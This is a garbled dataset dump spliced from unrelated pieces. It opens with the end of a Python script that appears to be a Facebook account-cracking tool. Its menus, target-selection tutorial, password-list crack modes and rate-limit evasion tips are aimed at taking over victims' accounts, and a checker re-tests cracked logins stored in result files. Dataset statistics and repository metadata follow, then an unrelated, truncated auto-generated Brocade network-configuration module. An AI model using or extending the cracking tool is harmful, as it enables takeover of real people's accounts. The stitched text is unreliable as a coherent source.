        ngew = [yy.text for yy in xnxx.find_all("option")]
        if(str(len(ngew))=="0"):
            print("%s[%s•%s] %sOne Tap Account"%(H,P,H,P))
        else:
            print("%s[%s•%s] %sThereis %s Option "%(O,P,O,P,str(len(ngew))))
        for opt in range(len(ngew)):
            print(" "*3, str(opt+1)+". "+ngew[opt])
    elif "login_error" in str(run):
        oh = run.find("div",{"id":"login_error"}).find("div").text
        print("%s[%s!%s] %s%s"%(M,P,M,P,oh))
    else:
        print("%s[%s!%s] %sPassword Has Changed"%(M,P,M,P))
def cek_hasil():
    jalan('%s╠══[ %sCheck Crack Result Account Options %s]'%(O,P,O))
    print('%s║'%(O))
    print('%s╠══[%s•%s] %sExample File : CP/%s.txt'%(O,P,O,P,tanggal))
    files = input('%s╠══[%s•%s] %sFile : '%(O,P,O,P))
    try:
        buka_baju = open(files,"r").readlines()
    except FileNotFoundError:
        print("%s╚══[%s!%s] %sFile Not Existing"%(M,P,M,P))
        time.sleep(2); cek_hasil()
    print("%s╚══[%s•%s] %sNumber of Accounts : %s"%(O,P,O,P,str(len(buka_baju))))
    print("")
    for memek in buka_baju:
        kontol = memek.replace("\n","")
        titid  = kontol.split("•")
        print("%s[%s•%s] %sCheck Login : %s"%(O,P,O,P,kontol))
        try:
            log_hasil(titid[0], titid[1])
        except requests.exceptions.ConnectionError:
            continue
        print("")
    print("")
    print('%s╔══[%s•%s] %s Checking Process Complete'%(O,P,O,P))
    print('%s║'%(O))
    input('%s╚══[ %sReturn %s]%s'%(O,P,O,P))
    menu()
def var_menu():
    print('%s╔══[ %sSelect Method Login %s]'%(O,P,O))
    print('%s║'%(O))
    print('%s╠══[%s1%s] %sLogin with Token'%(O,P,O,P))
    print('%s╠══[%s2%s] %sLogin with Cookies'%(O,P,O,P))
    print('%s╠══[%s3%s] %sScript Usage Tutorial'%(O,P,O,P))
    print('%s╠══[%s4%s] %sInfo Author & Team Project'%(O,P,O,P))
    print('%s╠══[%s0%s] %sGo Back'%(O,P,O,P))
def var_tutor():
    mlaku('%s╔══[%s Tips & Tutorial %s]'%(O,P,O))
    print('%s║'%(O))
    print('%s╠══[%s1%s] %sHow to Take Token'%(O,P,O,P))
    print('%s╠══[%s2%s] %sHow to Take Cookies'%(O,P,O,P))
    print('%s╠══[%s3%s] %sHow to Get Target'%(O,P,O,P))
    print('%s╠══[%s4%s] %sWays During the Crack Process'%(O,P,O,P))
def tutor_target():
    mlaku('%s╠═══╦══════════════════════════════════════════════════════╗'%(O))
    mlaku('%s║ %s1 %s║ %sPrepare a Sacrificial Account In Chrome For Cracking Process %s║'%(O,P,O,P,O))
    mlaku('%s║ %s2 %s║ %sChange the Victim Account Password First          %s║'%(O,P,O,P,O))
    mlaku('%s║ %s3 %s║ %sFind Random Account Targets, Friends List Must Be Public   %s║'%(O,P,O,P,O))
    mlaku('%s║ %s4 %s║ %sFriends (FL) Free, Can be 1K, 2K, 3K, ,4K, Or 5K      %s║'%(O,P,O,P,O))
    mlaku('%s║ %s5 %s║ %sMore Friends, More Possible Results  %s║'%(O,P,O,P,O))
    mlaku('%s║ %s6 %s║ %sTap Target Profile/Cover Photo                      %s║'%(O,P,O,P,O))
    mlaku('%s║ %s7 %s║ %ssee URL/Link Above, There is \ id = 10001xx\ %s║'%(O,P,O,P,O))
    mlaku('%s║ %s8 %s║ %sWell, thats a target ID ready to crack   %s║'%(O,P,O,P,O))
    mlaku('%s║ %s9 %s║ %sOpen Termux/Linux then proceed to the Crack Process %s║'%(O,P,O,P,O))
    mlaku('%s╠═══╩══════════════════════════════════════════════════════╝'%(O))
    print('%s║'%(O))
def tutor_crack():
    mlaku('%s╠═══╦══════════════════════════════════════════════════════╗'%(O))
    mlaku('%s║ %s1 %s║ %sMethod Api : Fast But Easy Process Spam            %s║'%(O,P,O,P,O))
    mlaku('%s║ %s2 %s║ %sMethod Mbasic : The process is quite fast, rarely spammed  %s║'%(O,P,O,P,O))
    mlaku('%s║ %s3 %s║ %sMethod Mobile : Slow Process, Probably OK  %s║'%(O,P,O,P,O))
    mlaku('%s║ %s4 %s║ %sCrack Using Data Quota (Not Support Wifi)  %s║'%(O,P,O,P,O))
    mlaku('%s║ %s5 %s║ %sIf Results Do Not Appear While The Crack Is Running       %s║'%(O,P,O,P,O))
    mlaku('%s║ %s6 %s║ %sTurn On Airplane Mode Only 5 Seconds                   %s║'%(O,P,O,P,O))
    mlaku('%s╠═══╩══════════════════════════════════════════════════════╝'%(O))
    print('%s║'%(O))
def var_author():
    mlaku('%s╔══[ %sAuthor & Team Project %s]'%(O,P,O))
    mlaku('%s║'%(O))
    mlaku('%s╠══[%s•%s] %sAuthor :'%(O,P,O,P))
    mlaku('%s║     • %sMARK'%(O,P))
    mlaku('%s║     • %sOFONCITI'%(O,P))
    mlaku('%s║'%(O))
    mlaku('%s╠══[%s•%s] %sTeam Project %sMARK TECHNOLOGY%s :'%(O,P,O,P,O,P))
    mlaku('%s║     • %sMARK'%(O,P))
    mlaku('%s║     • %sDAVOLA'%(O,P))
    mlaku('%s║     • %sJEWEL'%(O,P))
    mlaku('%s║     • %sOFONCITY '%(O,P))
    mlaku('%s║     • %sPRINCE'%(O,P))
    mlaku('%s║     • %sENOCH'%(O,P))
    mlaku('%s║     • %sRAJAT'%(O,P))
    mlaku('%s║     • %sDAMMY'%(O,P))
    mlaku('%s║     • %sUDUAK'%(O,P))
    mlaku('%s║     • %sFLEMZY'%(O,P))
    mlaku('%s║     • %sMIRACEL'%(O,P))
    mlaku('%s║     • %sFOREGNER'%(O,P))
    mlaku('%s║'%(O))
def var_ugen():
    print("%s╠══[%s1%s] %sGet User Agent"%(O,P,O,P))
    print("%s╠══[%s2%s] %sChange User Agent%s(%sManual%s)"%(O,P,O,P,O,P,O))
    print("%s╠══[%s3%s] %sChange User Agent %s(%sAdjust HP%s)"%(O,P,O,P,O,P,O))
    print("%s╠══[%s4%s] %sDelete User Agent"%(O,P,O,P))
    print("%s╠══[%s5%s] %sCheck User Agent"%(O,P,O,P))
    print("%s╠══[%s0%s] %sReturn"%(O,P,O,P))
def start_method():
    print('%s║'%(O))
    print('%s╠══[%s1%s] %sMethod Api'%(O,P,O,P))
    print('%s╠══[%s2%s] %sMethod Mbasic'%(O,P,O,P))
    print('%s╠══[%s3%s] %sMethod Free FB'%(O,P,O,P))
def start_methodezz():
    print('%s║'%(O))
    print('%s╠══[%s1%s] %sFast Crack %s[%s6 pass%s]'%(O,P,O,P,O,P,O))
    print('%s╠══[%s2%s] %sSlow Crack %s[%s9 pass%s]'%(O,P,O,P,O,P,O))
    print('%s╠══[%s3%s] %sVery Slow Crack %s[%s12 pass%s]'%(O,P,O,P,O,P,O))
    print('%s╠══[%s4%s] %sCrack Password Combine'%(O,P,O,P))
def started():
    print('%s║'%(O))
    print('%s╠══[%s•%s] %sCrack Is Running...'%(O,P,O,P))
    print('%s╠══[%s•%s] %sAccount [OK] Saved To OK/%s.txt'%(O,P,O,P,tanggal))
    print('%s╠══[%s•%s] %sAccount [CP] Saved To CP/%s.txt'%(O,P,O,P,tanggal))
    print('%s╚══[%s•%s] %sActivate Airplane Mode [5 Seconds Only] Every 5 Minutes\n'%(O,P,O,P))
def folder():
    try:os.mkdir("CP")
    except:pass
    try:os.mkdir("OK")
    except:pass
if __name__=='__main__':
  os.system('git pull')
  folder()
  menu()
# Mau Ngapain Cuk?
"))"))"))"))
| 122,160
| 244,306
| 0.999955
| 6
| 244,320
| 40,718.166667
| 0.833333
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.091238
| 0.000008
| 244,320
| 2
| 244,306
| 122,160
| 0.908726
| 0
| 0
| 0
| 0
| 0
| 0.999832
| 0.999832
| 0
| 1
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 0.5
| 0
| 0.5
| 0
| 1
| 0
| 1
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| null | 1
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 0
| 0
|
0
| 10
|
7c2de04bcc0b1be14c4e2eed0ff82a7a01133232
| 84,902
|
py
|
Python
|
pynos/versions/ver_7/ver_7_1_0/yang/brocade_threshold_monitor.py
|
bdeetz/pynos
|
bd8a34e98f322de3fc06750827d8bbc3a0c00380
|
[
"Apache-2.0"
] | 12
|
2015-09-21T23:56:09.000Z
|
2018-03-30T04:35:32.000Z
|
pynos/versions/ver_7/ver_7_1_0/yang/brocade_threshold_monitor.py
|
bdeetz/pynos
|
bd8a34e98f322de3fc06750827d8bbc3a0c00380
|
[
"Apache-2.0"
] | 10
|
2016-09-15T19:03:27.000Z
|
2017-07-17T23:38:01.000Z
|
pynos/versions/ver_7/ver_7_1_0/yang/brocade_threshold_monitor.py
|
bdeetz/pynos
|
bd8a34e98f322de3fc06750827d8bbc3a0c00380
|
[
"Apache-2.0"
] | 6
|
2015-08-14T08:05:23.000Z
|
2022-02-03T15:33:54.000Z
|
#!/usr/bin/env python
import xml.etree.ElementTree as ET
class brocade_threshold_monitor(object):
"""Auto generated class.
"""
def __init__(self, **kwargs):
self._callback = kwargs.pop('callback')
def threshold_monitor_hidden_threshold_monitor_sfp_apply(self, **kwargs):
"""Auto Generated Code
"""
config = ET.Element("config")
threshold_monitor_hidden = ET.SubElement(config, "threshold-monitor-hidden", xmlns="urn:brocade.com:mgmt:brocade-threshold-monitor")
threshold_monitor = ET.SubElement(threshold_monitor_hidden, "threshold-monitor")
sfp = ET.SubElement(threshold_monitor, "sfp")
apply = ET.SubElement(sfp, "apply")
apply.text = kwargs.pop('apply')
callback = kwargs.pop('callback', self._callback)
return callback(config)
def threshold_monitor_hidden_threshold_monitor_sfp_pause(self, **kwargs):
"""Auto Generated Code
"""
config = ET.Element("config")
threshold_monitor_hidden = ET.SubElement(config, "threshold-monitor-hidden", xmlns="urn:brocade.com:mgmt:brocade-threshold-monitor")
threshold_monitor = ET.SubElement(threshold_monitor_hidden, "threshold-monitor")
sfp = ET.SubElement(threshold_monitor, "sfp")
pause = ET.SubElement(sfp, "pause")
callback = kwargs.pop('callback', self._callback)
return callback(config)
def threshold_monitor_hidden_threshold_monitor_sfp_policy_policy_name(self, **kwargs):
"""Auto Generated Code
"""
config = ET.Element("config")
threshold_monitor_hidden = ET.SubElement(config, "threshold-monitor-hidden", xmlns="urn:brocade.com:mgmt:brocade-threshold-monitor")
threshold_monitor = ET.SubElement(threshold_monitor_hidden, "threshold-monitor")
sfp = ET.SubElement(threshold_monitor, "sfp")
policy = ET.SubElement(sfp, "policy")
policy_name = ET.SubElement(policy, "policy_name")
policy_name.text = kwargs.pop('policy_name')
callback = kwargs.pop('callback', self._callback)
return callback(config)
def threshold_monitor_hidden_threshold_monitor_sfp_policy_area_type(self, **kwargs):
"""Auto Generated Code
"""
config = ET.Element("config")
threshold_monitor_hidden = ET.SubElement(config, "threshold-monitor-hidden", xmlns="urn:brocade.com:mgmt:brocade-threshold-monitor")
threshold_monitor = ET.SubElement(threshold_monitor_hidden, "threshold-monitor")
sfp = ET.SubElement(threshold_monitor, "sfp")
policy = ET.SubElement(sfp, "policy")
policy_name_key = ET.SubElement(policy, "policy_name")
policy_name_key.text = kwargs.pop('policy_name')
area = ET.SubElement(policy, "area")
area_value_key = ET.SubElement(area, "area_value")
area_value_key.text = kwargs.pop('area_value')
type = ET.SubElement(area, "type")
type.text = kwargs.pop('type')
callback = kwargs.pop('callback', self._callback)
return callback(config)
def threshold_monitor_hidden_threshold_monitor_sfp_policy_area_area_value(self, **kwargs):
"""Auto Generated Code
"""
config = ET.Element("config")
threshold_monitor_hidden = ET.SubElement(config, "threshold-monitor-hidden", xmlns="urn:brocade.com:mgmt:brocade-threshold-monitor")
threshold_monitor = ET.SubElement(threshold_monitor_hidden, "threshold-monitor")
sfp = ET.SubElement(threshold_monitor, "sfp")
policy = ET.SubElement(sfp, "policy")
policy_name_key = ET.SubElement(policy, "policy_name")
policy_name_key.text = kwargs.pop('policy_name')
area = ET.SubElement(policy, "area")
type_key = ET.SubElement(area, "type")
type_key.text = kwargs.pop('type')
area_value = ET.SubElement(area, "area_value")
area_value.text = kwargs.pop('area_value')
callback = kwargs.pop('callback', self._callback)
return callback(config)
def threshold_monitor_hidden_threshold_monitor_sfp_policy_area_threshold_high_threshold(self, **kwargs):
"""Auto Generated Code
"""
config = ET.Element("config")
threshold_monitor_hidden = ET.SubElement(config, "threshold-monitor-hidden", xmlns="urn:brocade.com:mgmt:brocade-threshold-monitor")
threshold_monitor = ET.SubElement(threshold_monitor_hidden, "threshold-monitor")
sfp = ET.SubElement(threshold_monitor, "sfp")
policy = ET.SubElement(sfp, "policy")
policy_name_key = ET.SubElement(policy, "policy_name")
policy_name_key.text = kwargs.pop('policy_name')
area = ET.SubElement(policy, "area")
type_key = ET.SubElement(area, "type")
type_key.text = kwargs.pop('type')
area_value_key = ET.SubElement(area, "area_value")
area_value_key.text = kwargs.pop('area_value')
threshold = ET.SubElement(area, "threshold")
high_threshold = ET.SubElement(threshold, "high-threshold")
high_threshold.text = kwargs.pop('high_threshold')
callback = kwargs.pop('callback', self._callback)
return callback(config)
def threshold_monitor_hidden_threshold_monitor_sfp_policy_area_threshold_low_threshold(self, **kwargs):
"""Auto Generated Code
"""
config = ET.Element("config")
threshold_monitor_hidden = ET.SubElement(config, "threshold-monitor-hidden", xmlns="urn:brocade.com:mgmt:brocade-threshold-monitor")
threshold_monitor = ET.SubElement(threshold_monitor_hidden, "threshold-monitor")
sfp = ET.SubElement(threshold_monitor, "sfp")
policy = ET.SubElement(sfp, "policy")
policy_name_key = ET.SubElement(policy, "policy_name")
policy_name_key.text = kwargs.pop('policy_name')
area = ET.SubElement(policy, "area")
type_key = ET.SubElement(area, "type")
type_key.text = kwargs.pop('type')
area_value_key = ET.SubElement(area, "area_value")
area_value_key.text = kwargs.pop('area_value')
threshold = ET.SubElement(area, "threshold")
low_threshold = ET.SubElement(threshold, "low-threshold")
low_threshold.text = kwargs.pop('low_threshold')
callback = kwargs.pop('callback', self._callback)
return callback(config)
def threshold_monitor_hidden_threshold_monitor_sfp_policy_area_threshold_buffer(self, **kwargs):
"""Auto Generated Code
"""
config = ET.Element("config")
threshold_monitor_hidden = ET.SubElement(config, "threshold-monitor-hidden", xmlns="urn:brocade.com:mgmt:brocade-threshold-monitor")
threshold_monitor = ET.SubElement(threshold_monitor_hidden, "threshold-monitor")
sfp = ET.SubElement(threshold_monitor, "sfp")
policy = ET.SubElement(sfp, "policy")
policy_name_key = ET.SubElement(policy, "policy_name")
policy_name_key.text = kwargs.pop('policy_name')
area = ET.SubElement(policy, "area")
type_key = ET.SubElement(area, "type")
type_key.text = kwargs.pop('type')
area_value_key = ET.SubElement(area, "area_value")
area_value_key.text = kwargs.pop('area_value')
threshold = ET.SubElement(area, "threshold")
buffer = ET.SubElement(threshold, "buffer")
buffer.text = kwargs.pop('buffer')
callback = kwargs.pop('callback', self._callback)
return callback(config)
def threshold_monitor_hidden_threshold_monitor_sfp_policy_area_alert_above_above_highthresh_action(self, **kwargs):
"""Auto Generated Code
"""
config = ET.Element("config")
threshold_monitor_hidden = ET.SubElement(config, "threshold-monitor-hidden", xmlns="urn:brocade.com:mgmt:brocade-threshold-monitor")
threshold_monitor = ET.SubElement(threshold_monitor_hidden, "threshold-monitor")
sfp = ET.SubElement(threshold_monitor, "sfp")
policy = ET.SubElement(sfp, "policy")
policy_name_key = ET.SubElement(policy, "policy_name")
policy_name_key.text = kwargs.pop('policy_name')
area = ET.SubElement(policy, "area")
type_key = ET.SubElement(area, "type")
type_key.text = kwargs.pop('type')
area_value_key = ET.SubElement(area, "area_value")
area_value_key.text = kwargs.pop('area_value')
alert = ET.SubElement(area, "alert")
above = ET.SubElement(alert, "above")
above_highthresh_action = ET.SubElement(above, "above-highthresh-action")
above_highthresh_action.text = kwargs.pop('above_highthresh_action')
callback = kwargs.pop('callback', self._callback)
return callback(config)
def threshold_monitor_hidden_threshold_monitor_sfp_policy_area_alert_below_below_highthresh_action(self, **kwargs):
"""Auto Generated Code
"""
config = ET.Element("config")
threshold_monitor_hidden = ET.SubElement(config, "threshold-monitor-hidden", xmlns="urn:brocade.com:mgmt:brocade-threshold-monitor")
threshold_monitor = ET.SubElement(threshold_monitor_hidden, "threshold-monitor")
sfp = ET.SubElement(threshold_monitor, "sfp")
policy = ET.SubElement(sfp, "policy")
policy_name_key = ET.SubElement(policy, "policy_name")
policy_name_key.text = kwargs.pop('policy_name')
area = ET.SubElement(policy, "area")
type_key = ET.SubElement(area, "type")
type_key.text = kwargs.pop('type')
area_value_key = ET.SubElement(area, "area_value")
area_value_key.text = kwargs.pop('area_value')
alert = ET.SubElement(area, "alert")
below = ET.SubElement(alert, "below")
below_highthresh_action = ET.SubElement(below, "below-highthresh-action")
below_highthresh_action.text = kwargs.pop('below_highthresh_action')
callback = kwargs.pop('callback', self._callback)
return callback(config)
def threshold_monitor_hidden_threshold_monitor_sfp_policy_area_alert_below_below_lowthresh_action(self, **kwargs):
"""Auto Generated Code
"""
config = ET.Element("config")
threshold_monitor_hidden = ET.SubElement(config, "threshold-monitor-hidden", xmlns="urn:brocade.com:mgmt:brocade-threshold-monitor")
threshold_monitor = ET.SubElement(threshold_monitor_hidden, "threshold-monitor")
sfp = ET.SubElement(threshold_monitor, "sfp")
policy = ET.SubElement(sfp, "policy")
policy_name_key = ET.SubElement(policy, "policy_name")
policy_name_key.text = kwargs.pop('policy_name')
area = ET.SubElement(policy, "area")
type_key = ET.SubElement(area, "type")
type_key.text = kwargs.pop('type')
area_value_key = ET.SubElement(area, "area_value")
area_value_key.text = kwargs.pop('area_value')
alert = ET.SubElement(area, "alert")
below = ET.SubElement(alert, "below")
below_lowthresh_action = ET.SubElement(below, "below-lowthresh-action")
below_lowthresh_action.text = kwargs.pop('below_lowthresh_action')
callback = kwargs.pop('callback', self._callback)
return callback(config)
def threshold_monitor_hidden_threshold_monitor_security_apply(self, **kwargs):
"""Auto Generated Code
"""
config = ET.Element("config")
threshold_monitor_hidden = ET.SubElement(config, "threshold-monitor-hidden", xmlns="urn:brocade.com:mgmt:brocade-threshold-monitor")
threshold_monitor = ET.SubElement(threshold_monitor_hidden, "threshold-monitor")
security = ET.SubElement(threshold_monitor, "security")
apply = ET.SubElement(security, "apply")
apply.text = kwargs.pop('apply')
callback = kwargs.pop('callback', self._callback)
return callback(config)
def threshold_monitor_hidden_threshold_monitor_security_pause(self, **kwargs):
"""Auto Generated Code
"""
config = ET.Element("config")
threshold_monitor_hidden = ET.SubElement(config, "threshold-monitor-hidden", xmlns="urn:brocade.com:mgmt:brocade-threshold-monitor")
threshold_monitor = ET.SubElement(threshold_monitor_hidden, "threshold-monitor")
security = ET.SubElement(threshold_monitor, "security")
pause = ET.SubElement(security, "pause")
callback = kwargs.pop('callback', self._callback)
return callback(config)
def threshold_monitor_hidden_threshold_monitor_security_policy_sec_policy_name(self, **kwargs):
"""Auto Generated Code
"""
config = ET.Element("config")
threshold_monitor_hidden = ET.SubElement(config, "threshold-monitor-hidden", xmlns="urn:brocade.com:mgmt:brocade-threshold-monitor")
threshold_monitor = ET.SubElement(threshold_monitor_hidden, "threshold-monitor")
security = ET.SubElement(threshold_monitor, "security")
policy = ET.SubElement(security, "policy")
sec_policy_name = ET.SubElement(policy, "sec_policy_name")
sec_policy_name.text = kwargs.pop('sec_policy_name')
callback = kwargs.pop('callback', self._callback)
return callback(config)
def threshold_monitor_hidden_threshold_monitor_security_policy_area_sec_area_value(self, **kwargs):
"""Auto Generated Code
"""
config = ET.Element("config")
threshold_monitor_hidden = ET.SubElement(config, "threshold-monitor-hidden", xmlns="urn:brocade.com:mgmt:brocade-threshold-monitor")
threshold_monitor = ET.SubElement(threshold_monitor_hidden, "threshold-monitor")
security = ET.SubElement(threshold_monitor, "security")
policy = ET.SubElement(security, "policy")
sec_policy_name_key = ET.SubElement(policy, "sec_policy_name")
sec_policy_name_key.text = kwargs.pop('sec_policy_name')
area = ET.SubElement(policy, "area")
sec_area_value = ET.SubElement(area, "sec_area_value")
sec_area_value.text = kwargs.pop('sec_area_value')
callback = kwargs.pop('callback', self._callback)
return callback(config)
def threshold_monitor_hidden_threshold_monitor_security_policy_area_timebase(self, **kwargs):
"""Auto Generated Code
"""
config = ET.Element("config")
threshold_monitor_hidden = ET.SubElement(config, "threshold-monitor-hidden", xmlns="urn:brocade.com:mgmt:brocade-threshold-monitor")
threshold_monitor = ET.SubElement(threshold_monitor_hidden, "threshold-monitor")
security = ET.SubElement(threshold_monitor, "security")
policy = ET.SubElement(security, "policy")
sec_policy_name_key = ET.SubElement(policy, "sec_policy_name")
sec_policy_name_key.text = kwargs.pop('sec_policy_name')
area = ET.SubElement(policy, "area")
sec_area_value_key = ET.SubElement(area, "sec_area_value")
sec_area_value_key.text = kwargs.pop('sec_area_value')
timebase = ET.SubElement(area, "timebase")
timebase.text = kwargs.pop('timebase')
callback = kwargs.pop('callback', self._callback)
return callback(config)
def threshold_monitor_hidden_threshold_monitor_security_policy_area_threshold_sec_high_threshold(self, **kwargs):
"""Auto Generated Code
"""
config = ET.Element("config")
threshold_monitor_hidden = ET.SubElement(config, "threshold-monitor-hidden", xmlns="urn:brocade.com:mgmt:brocade-threshold-monitor")
threshold_monitor = ET.SubElement(threshold_monitor_hidden, "threshold-monitor")
security = ET.SubElement(threshold_monitor, "security")
policy = ET.SubElement(security, "policy")
sec_policy_name_key = ET.SubElement(policy, "sec_policy_name")
sec_policy_name_key.text = kwargs.pop('sec_policy_name')
area = ET.SubElement(policy, "area")
sec_area_value_key = ET.SubElement(area, "sec_area_value")
sec_area_value_key.text = kwargs.pop('sec_area_value')
threshold = ET.SubElement(area, "threshold")
sec_high_threshold = ET.SubElement(threshold, "sec-high-threshold")
sec_high_threshold.text = kwargs.pop('sec_high_threshold')
callback = kwargs.pop('callback', self._callback)
return callback(config)
def threshold_monitor_hidden_threshold_monitor_security_policy_area_threshold_sec_low_threshold(self, **kwargs):
"""Auto Generated Code
"""
config = ET.Element("config")
threshold_monitor_hidden = ET.SubElement(config, "threshold-monitor-hidden", xmlns="urn:brocade.com:mgmt:brocade-threshold-monitor")
threshold_monitor = ET.SubElement(threshold_monitor_hidden, "threshold-monitor")
security = ET.SubElement(threshold_monitor, "security")
policy = ET.SubElement(security, "policy")
sec_policy_name_key = ET.SubElement(policy, "sec_policy_name")
sec_policy_name_key.text = kwargs.pop('sec_policy_name')
area = ET.SubElement(policy, "area")
sec_area_value_key = ET.SubElement(area, "sec_area_value")
sec_area_value_key.text = kwargs.pop('sec_area_value')
threshold = ET.SubElement(area, "threshold")
sec_low_threshold = ET.SubElement(threshold, "sec-low-threshold")
sec_low_threshold.text = kwargs.pop('sec_low_threshold')
callback = kwargs.pop('callback', self._callback)
return callback(config)
def threshold_monitor_hidden_threshold_monitor_security_policy_area_threshold_sec_buffer(self, **kwargs):
"""Auto Generated Code
"""
config = ET.Element("config")
threshold_monitor_hidden = ET.SubElement(config, "threshold-monitor-hidden", xmlns="urn:brocade.com:mgmt:brocade-threshold-monitor")
threshold_monitor = ET.SubElement(threshold_monitor_hidden, "threshold-monitor")
security = ET.SubElement(threshold_monitor, "security")
policy = ET.SubElement(security, "policy")
sec_policy_name_key = ET.SubElement(policy, "sec_policy_name")
sec_policy_name_key.text = kwargs.pop('sec_policy_name')
area = ET.SubElement(policy, "area")
sec_area_value_key = ET.SubElement(area, "sec_area_value")
sec_area_value_key.text = kwargs.pop('sec_area_value')
threshold = ET.SubElement(area, "threshold")
sec_buffer = ET.SubElement(threshold, "sec-buffer")
sec_buffer.text = kwargs.pop('sec_buffer')
callback = kwargs.pop('callback', self._callback)
return callback(config)
def threshold_monitor_hidden_threshold_monitor_security_policy_area_alert_above_sec_above_highthresh_action(self, **kwargs):
    """Set security/policy/area/alert/above/sec-above-highthresh-action.

    Pops the policy/area keys plus 'sec_above_highthresh_action' and
    dispatches the assembled <config> to the callback.
    """
    config = ET.Element("config")
    hidden = ET.SubElement(
        config, "threshold-monitor-hidden",
        xmlns="urn:brocade.com:mgmt:brocade-threshold-monitor")
    monitor = ET.SubElement(hidden, "threshold-monitor")
    policy = ET.SubElement(ET.SubElement(monitor, "security"), "policy")
    ET.SubElement(policy, "sec_policy_name").text = kwargs.pop('sec_policy_name')
    area = ET.SubElement(policy, "area")
    ET.SubElement(area, "sec_area_value").text = kwargs.pop('sec_area_value')
    above = ET.SubElement(ET.SubElement(area, "alert"), "above")
    ET.SubElement(above, "sec-above-highthresh-action").text = kwargs.pop('sec_above_highthresh_action')
    return kwargs.pop('callback', self._callback)(config)
def threshold_monitor_hidden_threshold_monitor_security_policy_area_alert_below_sec_below_highthresh_action(self, **kwargs):
    """Set security/policy/area/alert/below/sec-below-highthresh-action.

    Pops the policy/area keys plus 'sec_below_highthresh_action' and
    dispatches the assembled <config> to the callback.
    """
    config = ET.Element("config")
    hidden = ET.SubElement(
        config, "threshold-monitor-hidden",
        xmlns="urn:brocade.com:mgmt:brocade-threshold-monitor")
    monitor = ET.SubElement(hidden, "threshold-monitor")
    policy = ET.SubElement(ET.SubElement(monitor, "security"), "policy")
    ET.SubElement(policy, "sec_policy_name").text = kwargs.pop('sec_policy_name')
    area = ET.SubElement(policy, "area")
    ET.SubElement(area, "sec_area_value").text = kwargs.pop('sec_area_value')
    below = ET.SubElement(ET.SubElement(area, "alert"), "below")
    ET.SubElement(below, "sec-below-highthresh-action").text = kwargs.pop('sec_below_highthresh_action')
    return kwargs.pop('callback', self._callback)(config)
def threshold_monitor_hidden_threshold_monitor_security_policy_area_alert_below_sec_below_lowthresh_action(self, **kwargs):
    """Set security/policy/area/alert/below/sec-below-lowthresh-action.

    Pops the policy/area keys plus 'sec_below_lowthresh_action' and
    dispatches the assembled <config> to the callback.
    """
    config = ET.Element("config")
    hidden = ET.SubElement(
        config, "threshold-monitor-hidden",
        xmlns="urn:brocade.com:mgmt:brocade-threshold-monitor")
    monitor = ET.SubElement(hidden, "threshold-monitor")
    policy = ET.SubElement(ET.SubElement(monitor, "security"), "policy")
    ET.SubElement(policy, "sec_policy_name").text = kwargs.pop('sec_policy_name')
    area = ET.SubElement(policy, "area")
    ET.SubElement(area, "sec_area_value").text = kwargs.pop('sec_area_value')
    below = ET.SubElement(ET.SubElement(area, "alert"), "below")
    ET.SubElement(below, "sec-below-lowthresh-action").text = kwargs.pop('sec_below_lowthresh_action')
    return kwargs.pop('callback', self._callback)(config)
def threshold_monitor_hidden_threshold_monitor_Cpu_poll(self, **kwargs):
    """Set threshold-monitor/Cpu/poll; pops 'poll' and dispatches config."""
    config = ET.Element("config")
    hidden = ET.SubElement(
        config, "threshold-monitor-hidden",
        xmlns="urn:brocade.com:mgmt:brocade-threshold-monitor")
    monitor = ET.SubElement(hidden, "threshold-monitor")
    node = ET.SubElement(monitor, "Cpu")
    ET.SubElement(node, "poll").text = kwargs.pop('poll')
    return kwargs.pop('callback', self._callback)(config)
def threshold_monitor_hidden_threshold_monitor_Cpu_retry(self, **kwargs):
    """Set threshold-monitor/Cpu/retry; pops 'retry' and dispatches config."""
    config = ET.Element("config")
    hidden = ET.SubElement(
        config, "threshold-monitor-hidden",
        xmlns="urn:brocade.com:mgmt:brocade-threshold-monitor")
    monitor = ET.SubElement(hidden, "threshold-monitor")
    node = ET.SubElement(monitor, "Cpu")
    ET.SubElement(node, "retry").text = kwargs.pop('retry')
    return kwargs.pop('callback', self._callback)(config)
def threshold_monitor_hidden_threshold_monitor_Cpu_limit(self, **kwargs):
    """Set threshold-monitor/Cpu/limit; pops 'limit' and dispatches config."""
    config = ET.Element("config")
    hidden = ET.SubElement(
        config, "threshold-monitor-hidden",
        xmlns="urn:brocade.com:mgmt:brocade-threshold-monitor")
    monitor = ET.SubElement(hidden, "threshold-monitor")
    node = ET.SubElement(monitor, "Cpu")
    ET.SubElement(node, "limit").text = kwargs.pop('limit')
    return kwargs.pop('callback', self._callback)(config)
def threshold_monitor_hidden_threshold_monitor_Cpu_actions(self, **kwargs):
    """Set threshold-monitor/Cpu/actions; pops 'actions' and dispatches config."""
    config = ET.Element("config")
    hidden = ET.SubElement(
        config, "threshold-monitor-hidden",
        xmlns="urn:brocade.com:mgmt:brocade-threshold-monitor")
    monitor = ET.SubElement(hidden, "threshold-monitor")
    node = ET.SubElement(monitor, "Cpu")
    ET.SubElement(node, "actions").text = kwargs.pop('actions')
    return kwargs.pop('callback', self._callback)(config)
def threshold_monitor_hidden_threshold_monitor_Memory_poll(self, **kwargs):
    """Set threshold-monitor/Memory/poll; pops 'poll' and dispatches config."""
    config = ET.Element("config")
    hidden = ET.SubElement(
        config, "threshold-monitor-hidden",
        xmlns="urn:brocade.com:mgmt:brocade-threshold-monitor")
    monitor = ET.SubElement(hidden, "threshold-monitor")
    node = ET.SubElement(monitor, "Memory")
    ET.SubElement(node, "poll").text = kwargs.pop('poll')
    return kwargs.pop('callback', self._callback)(config)
def threshold_monitor_hidden_threshold_monitor_Memory_retry(self, **kwargs):
    """Set threshold-monitor/Memory/retry; pops 'retry' and dispatches config."""
    config = ET.Element("config")
    hidden = ET.SubElement(
        config, "threshold-monitor-hidden",
        xmlns="urn:brocade.com:mgmt:brocade-threshold-monitor")
    monitor = ET.SubElement(hidden, "threshold-monitor")
    node = ET.SubElement(monitor, "Memory")
    ET.SubElement(node, "retry").text = kwargs.pop('retry')
    return kwargs.pop('callback', self._callback)(config)
def threshold_monitor_hidden_threshold_monitor_Memory_limit(self, **kwargs):
    """Set threshold-monitor/Memory/limit; pops 'limit' and dispatches config."""
    config = ET.Element("config")
    hidden = ET.SubElement(
